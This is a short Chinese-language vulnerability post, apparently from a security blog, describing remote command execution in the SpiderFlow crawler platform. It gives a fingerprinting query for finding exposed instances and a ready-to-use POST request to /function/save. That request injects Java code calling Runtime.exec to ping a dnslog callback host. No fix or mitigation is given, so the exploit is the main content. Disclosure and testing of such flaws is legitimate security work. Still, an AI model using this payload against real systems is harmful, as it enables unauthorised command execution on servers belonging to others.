SpiderFlow save 远程命令执行漏洞

漏洞描述

SpiderFlow 平台以流程图的⽅式定义爬⾍,是⼀个⾼度灵活可配置的爬⾍平台。

官⽹:https://www.spiderflow.org/

漏洞影响

SpiderFlow

网络测绘

title==”SpiderFlow”

漏洞复现

主页面

20240428152159876-1640438666683-12d29712-e90c-483b-b311-9fd25f852ca4.9d0935da_2024-04-28_15-21-38 (1)

发送请求包执行命令

POST /function/save

id=&name=cmd&parameter=yw&script=}Java.type('java.lang.Runtime').getRuntime().exec('ping chwd71.dnslog.cn');{

20240428152253370-1640438711420-73f701ff-c390-4201-96df-1e62cdf44208.d708beb8_2024-04-28_15-22-29 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容